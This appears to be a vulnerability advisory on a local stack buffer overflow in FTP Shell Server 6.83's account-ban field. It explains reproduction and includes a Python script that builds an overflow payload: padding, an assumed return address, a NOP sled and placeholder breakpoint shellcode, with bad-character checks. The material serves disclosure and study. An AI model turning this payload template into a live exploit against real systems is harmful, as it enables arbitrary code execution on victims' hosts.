FTP Shell Server Buffer Overflow Vulnerability Allowing Arbitrary Code Execution

Vulnerability

A buffer overflow vulnerability has been identified in FTP Shell Server version 6.83. The flaw is in the 'Account name to ban' field of the Manage FTP Accounts dialog: the application copies the supplied account name into a fixed-size stack buffer without checking its length, so an overlong string overwrites the saved return address. A local attacker who can reach the dialog can therefore redirect execution into shellcode carried in the same string; the published proof of concept launches calc.exe.

Impact

Successful exploitation gives arbitrary code execution on the affected system, running with the privileges of the user who launched FTP Shell Server. Because the vulnerable field is in the server's local management dialog rather than in the network-facing FTP service, the attacker needs interactive access to the host to trigger it.

Reproduction

To reproduce this vulnerability, open the FTP Shell Server application, navigate to the 'Manage FTP Accounts' dialog and add a new account. Paste a crafted payload into the 'Account name to ban' field. The payload consists of padding up to the saved return address, a replacement return address pointing at code that transfers control to the attacker's data, and the shellcode itself. When the field is submitted, the function that handles it returns through the overwritten address, the shellcode runs and the calculator (calc.exe) starts, confirming code execution. The exact padding length and return address depend on the 6.83 build and must be determined with a debugger; they are not published in this advisory.
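The payload layout the reproduction describes, as an added example that is not part of the original advisory or of the vendor's code. The overflow offset (260 bytes), the return address (0x7C9D30D7) and the stand-in shellcode (INT3 bytes rather than a real calc.exe launcher) are assumptions for illustration; against a real 6.83 install they would be found with a debugger. The bad-character check matters because the payload has to survive being pasted into a Win32 text field, where a NUL byte truncates the string and CR/LF act as line separators (an assumed bad-character set; the real set is confirmed by comparing the buffer in the debugger with what was pasted).

```python
import struct

# Assumed values for illustration: the advisory gives neither the overflow
# offset nor a return address for FTP Shell Server 6.83. Both must be
# measured with a debugger against the real binary.
OFFSET_TO_RET = 260              # padding bytes before the saved return address (assumed)
RET_ADDR = 0x7C9D30D7            # hypothetical "jmp esp"-style gadget address (not from the advisory)
NOP_SLED = b"\x90" * 16          # NOP sled so an imprecise landing still slides into the shellcode

# Stand-in shellcode: INT3 breakpoints, NOT a calc.exe launcher. Constructed so
# the layout can be checked offline; a real payload would substitute its own bytes.
PLACEHOLDER_SHELLCODE = b"\xcc" * 8

# Bytes that do not survive a paste into a Win32 edit control (assumed set):
# NUL terminates the C string, CR/LF are treated as line separators.
BAD_CHARS = frozenset({0x00, 0x0A, 0x0D})


def build_payload(shellcode, offset=OFFSET_TO_RET, ret_addr=RET_ADDR, sled=NOP_SLED):
    """Classic saved-return-address overwrite:
    [padding][return address, little-endian][NOP sled][shellcode]
    On x86 Windows the saved EIP is stored little-endian, hence "<I"."""
    padding = b"A" * offset
    ret = struct.pack("<I", ret_addr)
    return padding + ret + sled + shellcode


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return (index, byte) pairs for every byte the text field would mangle.
    An empty list means the payload can be pasted as-is."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def describe_layout(payload, offset=OFFSET_TO_RET, sled_len=len(NOP_SLED)):
    """Decode the layout back out of a built payload so it can be verified
    before it is pasted into the field."""
    (ret,) = struct.unpack("<I", payload[offset:offset + 4])
    shellcode_start = offset + 4 + sled_len
    return {
        "ret_addr": ret,
        "shellcode_start": shellcode_start,
        "shellcode": payload[shellcode_start:],
    }


def payload_as_text(payload):
    """The field takes text, not raw bytes: decode as Latin-1 so every byte
    maps to exactly one character and nothing is silently dropped."""
    return payload.decode("latin-1")


if __name__ == "__main__":
    p = build_payload(PLACEHOLDER_SHELLCODE)
    bad = find_bad_chars(p)
    if bad:
        raise SystemExit(f"payload contains bad characters at {[i for i, _ in bad]}")
    info = describe_layout(p)
    print(f"{len(p)} bytes, ret=0x{info['ret_addr']:08x}, shellcode at +{info['shellcode_start']}")
    # Write the text to a file so it can be opened and pasted into the dialog.
    with open("payload.txt", "w", encoding="latin-1", newline="") as f:
        f.write(payload_as_text(p))
```

Running the script with a return address such as 0x7C000000 makes find_bad_chars report the three NUL bytes that would truncate the string, which is exactly the failure a practitioner hits when a gadget address is chosen without checking it against the field's constraints. Bytes above 0x7F can additionally be altered by the edit control's code-page conversion on the way from the clipboard into the process, so the buffer contents should always be compared in the debugger with what was pasted before the shellcode is trusted.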

Added: Mar 22, 2026, 2:20 PM
Updated: Mar 22, 2026, 2:20 PM

Vulnerability Rating

Custom Algorithm
spread: 1.9
impact: 7.5
exploitability: 4.1
remediation: 0.0
relevance: 4.5
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.